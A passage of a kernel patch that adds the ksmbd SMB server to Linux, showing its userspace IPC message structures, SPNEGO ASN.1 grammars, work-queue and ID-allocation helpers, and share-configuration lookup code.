++ *    This event is to shutdown ksmbd server.
++ *
++ *  - KSMBD_EVENT_LOGIN_REQUEST/RESPONSE(ksmbd_login_request/response)
++ *    This event is to get user account info to user IPC daemon.
++ *
++ *  - KSMBD_EVENT_SHARE_CONFIG_REQUEST/RESPONSE(ksmbd_share_config_request/response)
++ *    This event is to get net share configuration info.
++ *
++ *  - KSMBD_EVENT_TREE_CONNECT_REQUEST/RESPONSE(ksmbd_tree_connect_request/response)
++ *    This event is to get session and tree connect info.
++ *
++ *  - KSMBD_EVENT_TREE_DISCONNECT_REQUEST(ksmbd_tree_disconnect_request)
++ *    This event is to send tree disconnect info to user IPC daemon.
++ *
++ *  - KSMBD_EVENT_LOGOUT_REQUEST(ksmbd_logout_request)
++ *    This event is to send logout request to user IPC daemon.
++ *
++ *  - KSMBD_EVENT_RPC_REQUEST/RESPONSE(ksmbd_rpc_command)
++ *    This event is to make DCE/RPC request like srvsvc, wkssvc, lsarpc,
++ *    samr to be processed in userspace.
++ *
++ *  - KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST/RESPONSE(ksmbd_spnego_authen_request/response)
++ *    This event is to make kerberos authentication to be processed in
++ *    userspace.
++ */
++
++#define KSMBD_GENL_NAME		"SMBD_GENL"
++#define KSMBD_GENL_VERSION		0x01
++
++#define KSMBD_REQ_MAX_ACCOUNT_NAME_SZ	48
++#define KSMBD_REQ_MAX_HASH_SZ		18
++#define KSMBD_REQ_MAX_SHARE_NAME	64
++
++/*
++ * IPC heartbeat frame to check whether user IPC daemon is alive.
++ */
++struct ksmbd_heartbeat {
++	__u32	handle;
++};
++
++/*
++ * Global config flags.
++ */
++#define KSMBD_GLOBAL_FLAG_INVALID		(0)
++#define KSMBD_GLOBAL_FLAG_SMB2_LEASES		BIT(0)
++#define KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION	BIT(1)
++#define KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL	BIT(2)
++
++/*
++ * IPC request for ksmbd server startup
++ */
++struct ksmbd_startup_request {
++	__u32	flags;			/* Flags for global config */
++	__s32	signing;		/* Signing enabled */
++	__s8	min_prot[16];		/* The minimum SMB protocol version */
++	__s8	max_prot[16];		/* The maximum SMB protocol version */
++	__s8	netbios_name[16];
++	__s8	work_group[64];		/* Workgroup */
++	__s8	server_string[64];	/* Server string */
++	__u16	tcp_port;		/* tcp port */
++	__u16	ipc_timeout;		/*
++					 * specifies the number of seconds
++					 * server will wait for the userspace to
++					 * reply to heartbeat frames.
++					 */
++	__u32	deadtime;		/* Number of minutes of inactivity */
++	__u32	file_max;		/* Limits the maximum number of open files */
++	__u32	smb2_max_write;		/* MAX write size */
++	__u32	smb2_max_read;		/* MAX read size */
++	__u32	smb2_max_trans;		/* MAX trans size */
++	__u32	share_fake_fscaps;	/*
++					 * Support some special application that
++					 * makes QFSINFO calls to check whether
++					 * we set the SPARSE_FILES bit (0x40).
++					 */
++	__u32	sub_auth[3];		/* Subauth value for Security ID */
++	__u32	smb2_max_credits;	/* MAX credits */
++	__u32	smbd_max_io_size;	/* smbd read write size */
++	__u32	max_connections;	/* Number of maximum simultaneous connections */
++	__u32	reserved[126];		/* Reserved room */
++	__u32	ifc_list_sz;		/* interfaces list size */
++	__s8	____payload[];
++};
++
++#define KSMBD_STARTUP_CONFIG_INTERFACES(s)	((s)->____payload)
++
++/*
++ * IPC request to shutdown ksmbd server.
++ */
++struct ksmbd_shutdown_request {
++	__s32	reserved[16];
++};
++
++/*
++ * IPC user login request.
++ */
++struct ksmbd_login_request {
++	__u32	handle;
++	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ]; /* user account name */
++	__u32	reserved[16];				/* Reserved room */
++};
++
++/*
++ * IPC user login response.
++ */
++struct ksmbd_login_response {
++	__u32	handle;
++	__u32	gid;					/* group id */
++	__u32	uid;					/* user id */
++	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ]; /* user account name */
++	__u16	status;
++	__u16	hash_sz;			/* hash size */
++	__s8	hash[KSMBD_REQ_MAX_HASH_SZ];	/* password hash */
++	__u32	reserved[16];			/* Reserved room */
++};
++
++/*
++ * IPC request to fetch net share config.
++ */
++struct ksmbd_share_config_request {
++	__u32	handle;
++	__s8	share_name[KSMBD_REQ_MAX_SHARE_NAME]; /* share name */
++	__u32	reserved[16];		/* Reserved room */
++};
++
++/*
++ * IPC response to the net share config request.
++ */
++struct ksmbd_share_config_response {
++	__u32	handle;
++	__u32	flags;
++	__u16	create_mask;
++	__u16	directory_mask;
++	__u16	force_create_mode;
++	__u16	force_directory_mode;
++	__u16	force_uid;
++	__u16	force_gid;
++	__s8	share_name[KSMBD_REQ_MAX_SHARE_NAME];
++	__u32	reserved[112];		/* Reserved room */
++	__u32	veto_list_sz;
++	__s8	____payload[];
++};
++
++#define KSMBD_SHARE_CONFIG_VETO_LIST(s)	((s)->____payload)
++
++static inline char *
++ksmbd_share_config_path(struct ksmbd_share_config_response *sc)
++{
++	char *p = sc->____payload;
++
++	if (sc->veto_list_sz)
++		p += sc->veto_list_sz + 1;
++
++	return p;
++}
++
++/*
++ * IPC request for tree connection. This request include session and tree
++ * connect info from client.
++ */
++struct ksmbd_tree_connect_request {
++	__u32	handle;
++	__u16	account_flags;
++	__u16	flags;
++	__u64	session_id;
++	__u64	connect_id;
++	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ];
++	__s8	share[KSMBD_REQ_MAX_SHARE_NAME];
++	__s8	peer_addr[64];
++	__u32	reserved[16];		/* Reserved room */
++};
++
++/*
++ * IPC Response structure for tree connection.
++ */
++struct ksmbd_tree_connect_response {
++	__u32	handle;
++	__u16	status;
++	__u16	connection_flags;
++	__u32	reserved[16];		/* Reserved room */
++};
++
++/*
++ * IPC Request struture to disconnect tree connection.
++ */
++struct ksmbd_tree_disconnect_request {
++	__u64	session_id;	/* session id */
++	__u64	connect_id;	/* tree connection id */
++	__u32	reserved[16];	/* Reserved room */
++};
++
++/*
++ * IPC Response structure to logout user account.
++ */
++struct ksmbd_logout_request {
++	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ]; /* user account name */
++	__u32	account_flags;
++	__u32	reserved[16];				/* Reserved room */
++};
++
++/*
++ * RPC command structure to send rpc request like srvsvc or wkssvc to
++ * IPC user daemon.
++ */
++struct ksmbd_rpc_command {
++	__u32	handle;
++	__u32	flags;
++	__u32	payload_sz;
++	__u8	payload[];
++};
++
++/*
++ * IPC Request Kerberos authentication
++ */
++struct ksmbd_spnego_authen_request {
++	__u32	handle;
++	__u16	spnego_blob_len;	/* the length of spnego_blob */
++	__u8	spnego_blob[];		/*
++					 * the GSS token from SecurityBuffer of
++					 * SMB2 SESSION SETUP request
++					 */
++};
++
++/*
++ * Response data which includes the GSS token and the session key generated by
++ * user daemon.
++ */
++struct ksmbd_spnego_authen_response {
++	__u32	handle;
++	struct ksmbd_login_response login_response; /*
++						     * the login response with
++						     * a user identified by the
++						     * GSS token from a client
++						     */
++	__u16	session_key_len; /* the length of the session key */
++	__u16	spnego_blob_len; /*
++				  * the length of  the GSS token which will be
++				  * stored in SecurityBuffer of SMB2 SESSION
++				  * SETUP response
++				  */
++	__u8	payload[]; /* session key + AP_REP */
++};
++
++/*
++ * This also used as NETLINK attribute type value.
++ *
++ * NOTE:
++ * Response message type value should be equal to
++ * request message type value + 1.
++ */
++enum ksmbd_event {
++	KSMBD_EVENT_UNSPEC			= 0,
++	KSMBD_EVENT_HEARTBEAT_REQUEST,
++
++	KSMBD_EVENT_STARTING_UP,
++	KSMBD_EVENT_SHUTTING_DOWN,
++
++	KSMBD_EVENT_LOGIN_REQUEST,
++	KSMBD_EVENT_LOGIN_RESPONSE		= 5,
++
++	KSMBD_EVENT_SHARE_CONFIG_REQUEST,
++	KSMBD_EVENT_SHARE_CONFIG_RESPONSE,
++
++	KSMBD_EVENT_TREE_CONNECT_REQUEST,
++	KSMBD_EVENT_TREE_CONNECT_RESPONSE,
++
++	KSMBD_EVENT_TREE_DISCONNECT_REQUEST	= 10,
++
++	KSMBD_EVENT_LOGOUT_REQUEST,
++
++	KSMBD_EVENT_RPC_REQUEST,
++	KSMBD_EVENT_RPC_RESPONSE,
++
++	KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST,
++	KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE	= 15,
++
++	KSMBD_EVENT_MAX
++};
++
++/*
++ * Enumeration for IPC tree connect status.
++ */
++enum KSMBD_TREE_CONN_STATUS {
++	KSMBD_TREE_CONN_STATUS_OK		= 0,
++	KSMBD_TREE_CONN_STATUS_NOMEM,
++	KSMBD_TREE_CONN_STATUS_NO_SHARE,
++	KSMBD_TREE_CONN_STATUS_NO_USER,
++	KSMBD_TREE_CONN_STATUS_INVALID_USER,
++	KSMBD_TREE_CONN_STATUS_HOST_DENIED	= 5,
++	KSMBD_TREE_CONN_STATUS_CONN_EXIST,
++	KSMBD_TREE_CONN_STATUS_TOO_MANY_CONNS,
++	KSMBD_TREE_CONN_STATUS_TOO_MANY_SESSIONS,
++	KSMBD_TREE_CONN_STATUS_ERROR,
++};
++
++/*
++ * User config flags.
++ */
++#define KSMBD_USER_FLAG_INVALID		(0)
++#define KSMBD_USER_FLAG_OK		BIT(0)
++#define KSMBD_USER_FLAG_BAD_PASSWORD	BIT(1)
++#define KSMBD_USER_FLAG_BAD_UID		BIT(2)
++#define KSMBD_USER_FLAG_BAD_USER	BIT(3)
++#define KSMBD_USER_FLAG_GUEST_ACCOUNT	BIT(4)
++#define KSMBD_USER_FLAG_DELAY_SESSION	BIT(5)
++
++/*
++ * Share config flags.
++ */
++#define KSMBD_SHARE_FLAG_INVALID		(0)
++#define KSMBD_SHARE_FLAG_AVAILABLE		BIT(0)
++#define KSMBD_SHARE_FLAG_BROWSEABLE		BIT(1)
++#define KSMBD_SHARE_FLAG_WRITEABLE		BIT(2)
++#define KSMBD_SHARE_FLAG_READONLY		BIT(3)
++#define KSMBD_SHARE_FLAG_GUEST_OK		BIT(4)
++#define KSMBD_SHARE_FLAG_GUEST_ONLY		BIT(5)
++#define KSMBD_SHARE_FLAG_STORE_DOS_ATTRS	BIT(6)
++#define KSMBD_SHARE_FLAG_OPLOCKS		BIT(7)
++#define KSMBD_SHARE_FLAG_PIPE			BIT(8)
++#define KSMBD_SHARE_FLAG_HIDE_DOT_FILES		BIT(9)
++#define KSMBD_SHARE_FLAG_INHERIT_OWNER		BIT(10)
++#define KSMBD_SHARE_FLAG_STREAMS		BIT(11)
++#define KSMBD_SHARE_FLAG_FOLLOW_SYMLINKS	BIT(12)
++#define KSMBD_SHARE_FLAG_ACL_XATTR		BIT(13)
++#define KSMBD_SHARE_FLAG_UPDATE		BIT(14)
++
++/*
++ * Tree connect request flags.
++ */
++#define KSMBD_TREE_CONN_FLAG_REQUEST_SMB1	(0)
++#define KSMBD_TREE_CONN_FLAG_REQUEST_IPV6	BIT(0)
++#define KSMBD_TREE_CONN_FLAG_REQUEST_SMB2	BIT(1)
++
++/*
++ * Tree connect flags.
++ */
++#define KSMBD_TREE_CONN_FLAG_GUEST_ACCOUNT	BIT(0)
++#define KSMBD_TREE_CONN_FLAG_READ_ONLY		BIT(1)
++#define KSMBD_TREE_CONN_FLAG_WRITABLE		BIT(2)
++#define KSMBD_TREE_CONN_FLAG_ADMIN_ACCOUNT	BIT(3)
++#define KSMBD_TREE_CONN_FLAG_UPDATE		BIT(4)
++
++/*
++ * RPC over IPC.
++ */
++#define KSMBD_RPC_METHOD_RETURN		BIT(0)
++#define KSMBD_RPC_SRVSVC_METHOD_INVOKE	BIT(1)
++#define KSMBD_RPC_SRVSVC_METHOD_RETURN	(KSMBD_RPC_SRVSVC_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
++#define KSMBD_RPC_WKSSVC_METHOD_INVOKE	BIT(2)
++#define KSMBD_RPC_WKSSVC_METHOD_RETURN	(KSMBD_RPC_WKSSVC_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
++#define KSMBD_RPC_IOCTL_METHOD		(BIT(3) | KSMBD_RPC_METHOD_RETURN)
++#define KSMBD_RPC_OPEN_METHOD		BIT(4)
++#define KSMBD_RPC_WRITE_METHOD		BIT(5)
++#define KSMBD_RPC_READ_METHOD		(BIT(6) | KSMBD_RPC_METHOD_RETURN)
++#define KSMBD_RPC_CLOSE_METHOD		BIT(7)
++#define KSMBD_RPC_RAP_METHOD		(BIT(8) | KSMBD_RPC_METHOD_RETURN)
++#define KSMBD_RPC_RESTRICTED_CONTEXT	BIT(9)
++#define KSMBD_RPC_SAMR_METHOD_INVOKE	BIT(10)
++#define KSMBD_RPC_SAMR_METHOD_RETURN	(KSMBD_RPC_SAMR_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
++#define KSMBD_RPC_LSARPC_METHOD_INVOKE	BIT(11)
++#define KSMBD_RPC_LSARPC_METHOD_RETURN	(KSMBD_RPC_LSARPC_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
++
++/*
++ * RPC status definitions.
++ */
++#define KSMBD_RPC_OK			0
++#define KSMBD_RPC_EBAD_FUNC		0x00000001
++#define KSMBD_RPC_EACCESS_DENIED	0x00000005
++#define KSMBD_RPC_EBAD_FID		0x00000006
++#define KSMBD_RPC_ENOMEM		0x00000008
++#define KSMBD_RPC_EBAD_DATA		0x0000000D
++#define KSMBD_RPC_ENOTIMPLEMENTED	0x00000040
++#define KSMBD_RPC_EINVALID_PARAMETER	0x00000057
++#define KSMBD_RPC_EMORE_DATA		0x000000EA
++#define KSMBD_RPC_EINVALID_LEVEL	0x0000007C
++#define KSMBD_RPC_SOME_NOT_MAPPED	0x00000107
++
++#define KSMBD_CONFIG_OPT_DISABLED	0
++#define KSMBD_CONFIG_OPT_ENABLED	1
++#define KSMBD_CONFIG_OPT_AUTO		2
++#define KSMBD_CONFIG_OPT_MANDATORY	3
++
++#endif /* _LINUX_KSMBD_SERVER_H */
+diff --git a/fs/smb/server/ksmbd_spnego_negtokeninit.asn1 b/fs/smb/server/ksmbd_spnego_negtokeninit.asn1
+new file mode 100644
+index 0000000000000..0065f191b54b7
+--- /dev/null
++++ b/fs/smb/server/ksmbd_spnego_negtokeninit.asn1
+@@ -0,0 +1,31 @@
++GSSAPI ::=
++	[APPLICATION 0] IMPLICIT SEQUENCE {
++		thisMech
++			OBJECT IDENTIFIER ({ksmbd_gssapi_this_mech}),
++		negotiationToken
++			NegotiationToken
++	}
++
++MechType ::= OBJECT IDENTIFIER ({ksmbd_neg_token_init_mech_type})
++
++MechTypeList ::= SEQUENCE OF MechType
++
++NegTokenInit ::=
++	SEQUENCE {
++		mechTypes
++			[0] MechTypeList,
++		reqFlags
++			[1] BIT STRING OPTIONAL,
++		mechToken
++			[2] OCTET STRING OPTIONAL ({ksmbd_neg_token_init_mech_token}),
++		mechListMIC
++			[3] OCTET STRING OPTIONAL
++	}
++
++NegotiationToken ::=
++	CHOICE {
++		negTokenInit
++			[0] NegTokenInit,
++		negTokenTarg
++			[1] ANY
++	}
+diff --git a/fs/smb/server/ksmbd_spnego_negtokentarg.asn1 b/fs/smb/server/ksmbd_spnego_negtokentarg.asn1
+new file mode 100644
+index 0000000000000..1151933e7b9c5
+--- /dev/null
++++ b/fs/smb/server/ksmbd_spnego_negtokentarg.asn1
+@@ -0,0 +1,19 @@
++GSSAPI ::=
++	CHOICE {
++		negTokenInit
++			[0] ANY,
++		negTokenTarg
++			[1] NegTokenTarg
++	}
++
++NegTokenTarg ::=
++	SEQUENCE {
++		negResult
++			[0] ENUMERATED OPTIONAL,
++		supportedMech
++			[1] OBJECT IDENTIFIER OPTIONAL,
++		responseToken
++			[2] OCTET STRING OPTIONAL ({ksmbd_neg_token_targ_resp_token}),
++		mechListMIC
++			[3] OCTET STRING OPTIONAL
++	}
+diff --git a/fs/smb/server/ksmbd_work.c b/fs/smb/server/ksmbd_work.c
+new file mode 100644
+index 0000000000000..14b9caebf7a4f
+--- /dev/null
++++ b/fs/smb/server/ksmbd_work.c
+@@ -0,0 +1,79 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/list.h>
++#include <linux/mm.h>
++#include <linux/slab.h>
++#include <linux/workqueue.h>
++
++#include "server.h"
++#include "connection.h"
++#include "ksmbd_work.h"
++#include "mgmt/ksmbd_ida.h"
++
++static struct kmem_cache *work_cache;
++static struct workqueue_struct *ksmbd_wq;
++
++struct ksmbd_work *ksmbd_alloc_work_struct(void)
++{
++	struct ksmbd_work *work = kmem_cache_zalloc(work_cache, GFP_KERNEL);
++
++	if (work) {
++		work->compound_fid = KSMBD_NO_FID;
++		work->compound_pfid = KSMBD_NO_FID;
++		INIT_LIST_HEAD(&work->request_entry);
++		INIT_LIST_HEAD(&work->async_request_entry);
++		INIT_LIST_HEAD(&work->fp_entry);
++		INIT_LIST_HEAD(&work->interim_entry);
++	}
++	return work;
++}
++
++void ksmbd_free_work_struct(struct ksmbd_work *work)
++{
++	WARN_ON(work->saved_cred != NULL);
++
++	kvfree(work->response_buf);
++	kvfree(work->aux_payload_buf);
++	kfree(work->tr_buf);
++	kvfree(work->request_buf);
++	if (work->async_id)
++		ksmbd_release_id(&work->conn->async_ida, work->async_id);
++	kmem_cache_free(work_cache, work);
++}
++
++void ksmbd_work_pool_destroy(void)
++{
++	kmem_cache_destroy(work_cache);
++}
++
++int ksmbd_work_pool_init(void)
++{
++	work_cache = kmem_cache_create("ksmbd_work_cache",
++				       sizeof(struct ksmbd_work), 0,
++				       SLAB_HWCACHE_ALIGN, NULL);
++	if (!work_cache)
++		return -ENOMEM;
++	return 0;
++}
++
++int ksmbd_workqueue_init(void)
++{
++	ksmbd_wq = alloc_workqueue("ksmbd-io", 0, 0);
++	if (!ksmbd_wq)
++		return -ENOMEM;
++	return 0;
++}
++
++void ksmbd_workqueue_destroy(void)
++{
++	destroy_workqueue(ksmbd_wq);
++	ksmbd_wq = NULL;
++}
++
++bool ksmbd_queue_work(struct ksmbd_work *work)
++{
++	return queue_work(ksmbd_wq, &work->work);
++}
+diff --git a/fs/smb/server/ksmbd_work.h b/fs/smb/server/ksmbd_work.h
+new file mode 100644
+index 0000000000000..5ece58e40c979
+--- /dev/null
++++ b/fs/smb/server/ksmbd_work.h
+@@ -0,0 +1,117 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_WORK_H__
++#define __KSMBD_WORK_H__
++
++#include <linux/ctype.h>
++#include <linux/workqueue.h>
++
++struct ksmbd_conn;
++struct ksmbd_session;
++struct ksmbd_tree_connect;
++
++enum {
++	KSMBD_WORK_ACTIVE = 0,
++	KSMBD_WORK_CANCELLED,
++	KSMBD_WORK_CLOSED,
++};
++
++/* one of these for every pending CIFS request at the connection */
++struct ksmbd_work {
++	/* Server corresponding to this mid */
++	struct ksmbd_conn               *conn;
++	struct ksmbd_session            *sess;
++	struct ksmbd_tree_connect       *tcon;
++
++	/* Pointer to received SMB header */
++	void                            *request_buf;
++	/* Response buffer */
++	void                            *response_buf;
++
++	/* Read data buffer */
++	void                            *aux_payload_buf;
++
++	/* Next cmd hdr in compound req buf*/
++	int                             next_smb2_rcv_hdr_off;
++	/* Next cmd hdr in compound rsp buf*/
++	int                             next_smb2_rsp_hdr_off;
++
++	/*
++	 * Current Local FID assigned compound response if SMB2 CREATE
++	 * command is present in compound request
++	 */
++	u64				compound_fid;
++	u64				compound_pfid;
++	u64				compound_sid;
++
++	const struct cred		*saved_cred;
++
++	/* Number of granted credits */
++	unsigned int			credits_granted;
++
++	/* response smb header size */
++	unsigned int                    resp_hdr_sz;
++	unsigned int                    response_sz;
++	/* Read data count */
++	unsigned int                    aux_payload_sz;
++
++	void				*tr_buf;
++
++	unsigned char			state;
++	/* Multiple responses for one request e.g. SMB ECHO */
++	bool                            multiRsp:1;
++	/* No response for cancelled request */
++	bool                            send_no_response:1;
++	/* Request is encrypted */
++	bool                            encrypted:1;
++	/* Is this SYNC or ASYNC ksmbd_work */
++	bool                            syncronous:1;
++	bool                            need_invalidate_rkey:1;
++
++	unsigned int                    remote_key;
++	/* cancel works */
++	int                             async_id;
++	void                            **cancel_argv;
++	void                            (*cancel_fn)(void **argv);
++
++	struct work_struct              work;
++	/* List head at conn->requests */
++	struct list_head                request_entry;
++	/* List head at conn->async_requests */
++	struct list_head                async_request_entry;
++	struct list_head                fp_entry;
++	struct list_head                interim_entry;
++};
++
++/**
++ * ksmbd_resp_buf_next - Get next buffer on compound response.
++ * @work: smb work containing response buffer
++ */
++static inline void *ksmbd_resp_buf_next(struct ksmbd_work *work)
++{
++	return work->response_buf + work->next_smb2_rsp_hdr_off + 4;
++}
++
++/**
++ * ksmbd_req_buf_next - Get next buffer on compound request.
++ * @work: smb work containing response buffer
++ */
++static inline void *ksmbd_req_buf_next(struct ksmbd_work *work)
++{
++	return work->request_buf + work->next_smb2_rcv_hdr_off + 4;
++}
++
++struct ksmbd_work *ksmbd_alloc_work_struct(void);
++void ksmbd_free_work_struct(struct ksmbd_work *work);
++
++void ksmbd_work_pool_destroy(void);
++int ksmbd_work_pool_init(void);
++
++int ksmbd_workqueue_init(void);
++void ksmbd_workqueue_destroy(void);
++bool ksmbd_queue_work(struct ksmbd_work *work);
++
++#endif /* __KSMBD_WORK_H__ */
+diff --git a/fs/smb/server/mgmt/ksmbd_ida.c b/fs/smb/server/mgmt/ksmbd_ida.c
+new file mode 100644
+index 0000000000000..54194d959a5ef
+--- /dev/null
++++ b/fs/smb/server/mgmt/ksmbd_ida.c
+@@ -0,0 +1,46 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include "ksmbd_ida.h"
++
++static inline int __acquire_id(struct ida *ida, int from, int to)
++{
++	return ida_simple_get(ida, from, to, GFP_KERNEL);
++}
++
++int ksmbd_acquire_smb2_tid(struct ida *ida)
++{
++	int id;
++
++	id = __acquire_id(ida, 1, 0xFFFFFFFF);
++
++	return id;
++}
++
++int ksmbd_acquire_smb2_uid(struct ida *ida)
++{
++	int id;
++
++	id = __acquire_id(ida, 1, 0);
++	if (id == 0xFFFE)
++		id = __acquire_id(ida, 1, 0);
++
++	return id;
++}
++
++int ksmbd_acquire_async_msg_id(struct ida *ida)
++{
++	return __acquire_id(ida, 1, 0);
++}
++
++int ksmbd_acquire_id(struct ida *ida)
++{
++	return __acquire_id(ida, 0, 0);
++}
++
++void ksmbd_release_id(struct ida *ida, int id)
++{
++	ida_simple_remove(ida, id);
++}
+diff --git a/fs/smb/server/mgmt/ksmbd_ida.h b/fs/smb/server/mgmt/ksmbd_ida.h
+new file mode 100644
+index 0000000000000..2bc07b16cfde9
+--- /dev/null
++++ b/fs/smb/server/mgmt/ksmbd_ida.h
+@@ -0,0 +1,34 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_IDA_MANAGEMENT_H__
++#define __KSMBD_IDA_MANAGEMENT_H__
++
++#include <linux/slab.h>
++#include <linux/idr.h>
++
++/*
++ * 2.2.1.6.7 TID Generation
++ *    The value 0xFFFF MUST NOT be used as a valid TID. All other
++ *    possible values for TID, including zero (0x0000), are valid.
++ *    The value 0xFFFF is used to specify all TIDs or no TID,
++ *    depending upon the context in which it is used.
++ */
++int ksmbd_acquire_smb2_tid(struct ida *ida);
++
++/*
++ * 2.2.1.6.8 UID Generation
++ *    The value 0xFFFE was declared reserved in the LAN Manager 1.0
++ *    documentation, so a value of 0xFFFE SHOULD NOT be used as a
++ *    valid UID.<21> All other possible values for a UID, excluding
++ *    zero (0x0000), are valid.
++ */
++int ksmbd_acquire_smb2_uid(struct ida *ida);
++int ksmbd_acquire_async_msg_id(struct ida *ida);
++
++int ksmbd_acquire_id(struct ida *ida);
++
++void ksmbd_release_id(struct ida *ida, int id);
++#endif /* __KSMBD_IDA_MANAGEMENT_H__ */
+diff --git a/fs/smb/server/mgmt/share_config.c b/fs/smb/server/mgmt/share_config.c
+new file mode 100644
+index 0000000000000..328a412259dc1
+--- /dev/null
++++ b/fs/smb/server/mgmt/share_config.c
+@@ -0,0 +1,234 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/list.h>
++#include <linux/jhash.h>
++#include <linux/slab.h>
++#include <linux/rwsem.h>
++#include <linux/parser.h>
++#include <linux/namei.h>
++#include <linux/sched.h>
++#include <linux/mm.h>
++
++#include "share_config.h"
++#include "user_config.h"
++#include "user_session.h"
++#include "../transport_ipc.h"
++#include "../misc.h"
++
++#define SHARE_HASH_BITS		3
++static DEFINE_HASHTABLE(shares_table, SHARE_HASH_BITS);
++static DECLARE_RWSEM(shares_table_lock);
++
++struct ksmbd_veto_pattern {
++	char			*pattern;
++	struct list_head	list;
++};
++
++static unsigned int share_name_hash(const char *name)
++{
++	return jhash(name, strlen(name), 0);
++}
++
++static void kill_share(struct ksmbd_share_config *share)
++{
++	while (!list_empty(&share->veto_list)) {
++		struct ksmbd_veto_pattern *p;
++
++		p = list_entry(share->veto_list.next,
++			       struct ksmbd_veto_pattern,
++			       list);
++		list_del(&p->list);
++		kfree(p->pattern);
++		kfree(p);
++	}
++
++	if (share->path)
++		path_put(&share->vfs_path);
++	kfree(share->name);
++	kfree(share->path);
++	kfree(share);
++}
++
++void ksmbd_share_config_del(struct ksmbd_share_config *share)
++{
++	down_write(&shares_table_lock);
++	hash_del(&share->hlist);
++	up_write(&shares_table_lock);
++}
++
++void __ksmbd_share_config_put(struct ksmbd_share_config *share)
++{
++	ksmbd_share_config_del(share);
++	kill_share(share);
++}
++
++static struct ksmbd_share_config *
++__get_share_config(struct ksmbd_share_config *share)
++{
++	if (!atomic_inc_not_zero(&share->refcount))
++		return NULL;
++	return share;
++}
++
++static struct ksmbd_share_config *__share_lookup(const char *name)
++{
++	struct ksmbd_share_config *share;
++	unsigned int key = share_name_hash(name);
++
++	hash_for_each_possible(shares_table, share, hlist, key) {
++		if (!strcmp(name, share->name))
++			return share;
++	}
++	return NULL;
++}
++
++static int parse_veto_list(struct ksmbd_share_config *share,
++			   char *veto_list,
++			   int veto_list_sz)
++{
++	int sz = 0;
++
++	if (!veto_list_sz)
++		return 0;
++
++	while (veto_list_sz > 0) {
++		struct ksmbd_veto_pattern *p;
++
++		sz = strlen(veto_list);
++		if (!sz)
++			break;
++
++		p = kzalloc(sizeof(struct ksmbd_veto_pattern), GFP_KERNEL);
++		if (!p)
++			return -ENOMEM;
++
++		p->pattern = kstrdup(veto_list, GFP_KERNEL);
++		if (!p->pattern) {
++			kfree(p);
++			return -ENOMEM;
++		}
++
++		list_add(&p->list, &share->veto_list);
++
++		veto_list += sz + 1;
++		veto_list_sz -= (sz + 1);
++	}
++
++	return 0;
++}
++
++static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
++						       const char *name)
++{
++	struct ksmbd_share_config_response *resp;
++	struct ksmbd_share_config *share = NULL;
++	struct ksmbd_share_config *lookup;
++	int ret;
++
++	resp = ksmbd_ipc_share_config_request(name);
++	if (!resp)
++		return NULL;
++
++	if (resp->flags == KSMBD_SHARE_FLAG_INVALID)
++		goto out;
++
++	if (*resp->share_name) {
++		char *cf_resp_name;
++		bool equal;
++
++		cf_resp_name = ksmbd_casefold_sharename(um, resp->share_name);
++		if (IS_ERR(cf_resp_name))
++			goto out;
++		equal = !strcmp(cf_resp_name, name);
++		kfree(cf_resp_name);
++		if (!equal)
++			goto out;
++	}
++
++	share = kzalloc(sizeof(struct ksmbd_share_config), GFP_KERNEL);
++	if (!share)
++		goto out;
++
++	share->flags = resp->flags;
++	atomic_set(&share->refcount, 1);
++	INIT_LIST_HEAD(&share->veto_list);
++	share->name = kstrdup(name, GFP_KERNEL);
++
++	if (!test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
++		share->path = kstrdup(ksmbd_share_config_path(resp),
++				      GFP_KERNEL);
++		if (share->path)
++			share->path_sz = strlen(share->path);
++		share->create_mask = resp->create_mask;
++		share->directory_mask = resp->directory_mask;
++		share->force_create_mode = resp->force_create_mode;
++		share->force_directory_mode = resp->force_directory_mode;
++		share->force_uid = resp->force_uid;
++		share->force_gid = resp->force_gid;
++		ret = parse_veto_list(share,
++				      KSMBD_SHARE_CONFIG_VETO_LIST(resp),
++				      resp->veto_list_sz);
++		if (!ret && share->path) {
++			ret = kern_path(share->path, 0, &share->vfs_path);
++			if (ret) {
++				ksmbd_debug(SMB, "failed to access '%s'\n",
++					    share->path);
++				/* Avoid put_path() */
++				kfree(share->path);
++				share->path = NULL;
++			}
++		}
++		if (ret || !share->name) {
++			kill_share(share);
++			share = NULL;
++			goto out;
++		}
++	}
++
++	down_write(&shares_table_lock);
++	lookup = __share_lookup(name);
++	if (lookup)
++		lookup = __get_share_config(lookup);
++	if (!lookup) {
++		hash_add(shares_table, &share->hlist, share_name_hash(name));
++	} else {
++		kill_share(share);
++		share = lookup;
++	}
++	up_write(&shares_table_lock);
++
++out:
++	kvfree(resp);
++	return share;
++}
++
++struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
++						  const char *name)
++{
++	struct ksmbd_share_config *share;
++
++	down_read(&shares_table_lock);
++	share = __share_lookup(name);
++	if (share)
++		share = __get_share_config(share);
++	up_read(&shares_table_lock);
++
++	if (share)
++		return share;
++	return share_config_request(um, name);
++}
++
++bool ksmbd_share_veto_filename(struct ksmbd_share_config *share,
